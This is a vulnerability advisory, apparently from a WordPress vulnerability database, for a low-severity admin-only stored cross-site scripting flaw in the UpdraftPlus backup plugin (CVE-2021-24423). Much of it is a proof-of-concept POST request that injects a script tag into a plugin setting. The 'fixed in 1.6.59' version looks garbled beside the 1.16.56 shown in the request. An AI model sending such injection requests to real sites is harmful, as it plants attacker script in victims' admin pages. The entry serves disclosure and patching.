WordPress Plugin Vulnerabilities

UpdraftPlus < 1.6.59 - Admin+ Stored Cross-Site Scripting

Description

The plugin does not sanitise its updraft_service settings, allowing high privilege users to set malicious JavaScript payload in it and leading to a Stored Cross-Site Scripting issue

Proof of Concept

PoC | Authenticated Persistent XSS | Settings > Choose your remote storage:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5767

action=updraft_savesettings&subaction=savesettings&nonce=c7120743dc&settings=option_page%3Dupdraft-options-group%26_wpnonce%3D01063ba263%26_wp_http_referer%3D%252Fwp-admin%252Foptions-general.php%253Fpage%253Dupdraftplus%26updraft_interval%3Dmonthly%26updraftplus_starttime_files%3D%26updraft_retain%3D1%26updraft_interval_database%3Dmanual%26updraftplus_starttime_db%3D%26updraft_retain_db%3D1%26updraft_service%255B%255D%3Demail"><script>alert();</script>%26updraft_dropbox%255Bversion%255D%3D1%26updraft_dropbox%255Bsettings%255D%255Bs-2a7caf3a74d504515081dfd0b531ccd2%255D%255Bdummy-nosave%255D%3D0%26updraft_s3%255Bversion%255D%3D1%26updraft_s3%255Bsettings%255D%255Bs-bc2287fa5dd4cdb455f4809ac57a09d7%255D%255Baccesskey%255D%3D%26updraft_s3%255Bsettings%255D%255Bs-bc2287fa5dd4cdb455f4809ac57a09d7%255D%255Bsecretkey%255D%3D%26updraft_s3%255Bsettings%255D%255Bs-bc2287fa5dd4cdb455f4809ac57a09d7%255D%255Bpath%255D%3D%26updraft_cloudfiles%255Bversion%255D%3D1%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Bauthurl%255D%3Dhttps%253A%252F%252Fauth.api.rackspacecloud.com%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Bregion%255D%3DDFW%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Buser%255D%3D%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Bapikey%255D%3D%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Bpath%255D%3D%26updraft_googledrive%255Bversion%255D%3D1%26updraft_googledrive%255Bsettings%255D%255Bs-ff2d80b9376e659dde6c8f7dbcf86b9c%255D%255Bfolder%255D%3DUpdraftPlus%26updraft_onedrive%255Bversion%255D%3D1%26updraft_ftp%255Bversion%255D%3D1%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Bhost%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Buser%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Bpass%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Bpath%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Bpassive%255D%3D1%26updraft_azure%255Bversion%255D%3D1%26updraft_sftp%255Bversion%255D%3D1%26updraft_googlecloud%255Bversion%255D%3D1%26updraft_backblaze%255Bversion%255D%3D1%26updraft_webdav%255Bversion%255D%3D1%26updraft_s3generic%255Bversion%255D%3D1%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Baccesskey%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Bsecretkey%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Bpath%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Bendpoint%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Bbucket_access_style%255D%3Dpath_style%26updraft_openstack%255Bversion%255D%3D1%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Bauthurl%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Btenant%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Bregion%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Buser%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Bpassword%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Bpath%255D%3D%26updraft_dreamobjects%255Bversion%255D%3D1%26updraft_dreamobjects%255Bsettings%255D%255Bs-edf60db5e5c21a0d5abb16b24b9ea0e9%255D%255Baccesskey%255D%3D%26updraft_dreamobjects%255Bsettings%255D%255Bs-edf60db5e5c21a0d5abb16b24b9ea0e9%255D%255Bsecretkey%255D%3D%26updraft_dreamobjects%255Bsettings%255D%255Bs-edf60db5e5c21a0d5abb16b24b9ea0e9%255D%255Bpath%255D%3D%26updraft_dreamobjects%255Bsettings%255D%255Bs-edf60db5e5c21a0d5abb16b24b9ea0e9%255D%255Bendpoint%255D%3Dobjects-us-east-1.dream.io%26updraft_include_plugins%3D1%26updraft_include_themes%3D1%26updraft_include_uploads%3D1%26updraft_include_uploads_exclude%3Dbackup*%252C*backups%252Cbackwpup*%252Cwp-clone%252Csnapshots%26updraft_include_uploads_exclude_entity%255B%255D%3Dbackup*%26updraft_include_uploads_exclude_entity%255B%255D%3D*backups%26updraft_include_uploads_exclude_entity%255B%255D%3Dbackwpup*%26updraft_include_uploads_exclude_entity%255B%255D%3Dwp-clone%26updraft_include_uploads_exclude_entity%255B%255D%3Dsnapshots%26updraft_include_others%3D1%26updraft_include_others_exclude%3Dupdraft%252Cbackup*%252C*backups%252Cmysql.sql%252Cdebug.log%26updraft_include_others_exclude_entity%255B%255D%3Dupdraft%26updraft_include_others_exclude_entity%255B%255D%3Dbackup*%26updraft_include_others_exclude_entity%255B%255D%3D*backups%26updraft_include_others_exclude_entity%255B%255D%3Dmysql.sql%26updraft_include_others_exclude_entity%255B%255D%3Ddebug.log%26updraft_email%3Dvladm0ze%2540gmail.com%26updraft_debug_mode%3D1%26updraft_split_every%3D40013%26updraft_delete_local%3D1%26updraft_dir%3D40013%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_ssl_useservercerts%3D0%26updraft_ssl_disableverify%3D0%26updraft_ssl_nossl%3D0%26updraft_auto_updates%3D0&updraftplus_version=1.16.56

Affects Plugins

Plugin icon
updraftplus
Fixed in 1.6.59

References

CVE
CVE-2021-24423
URL
https://m0ze.ru/vulnerability/[2021-05-09]-[WordPress]-[CWE-79]-UpdraftPlus-WordPress-Plugin-v1.16.56.txt

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.4 (low)

Miscellaneous

Original Researcher
m0ze
Submitter
m0ze
Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified
Yes
WPVDB ID
541974d6-2df8-4497-9aee-afd3b9024102

Timeline

Publicly Published
2021-05-09 (about 3 years ago)
Added
2021-12-27 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)

Other

Published
Title
Published
2021-09-09
Title
Yet Another bol.com Plugin <= 1.4 - Reflected Cross-Site Scripting
Published
2012-05-22
Title
Events Manager < 5.1.7 - Cross-Site Scripting (XSS)
Published
2023-12-13
Title
WP Crowdfunding < 2.1.9 - Reflected XSS
Published
2022-08-12
Title
Notification Bar for WordPress <= 1.1.8 - Unauthenticated Stored Cross-Site Scripting
Published
2024-03-26
Title
Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds for Google, Facebook/Meta, Bing, & More < 13.2.6 - Reflected Cross-Site Scripting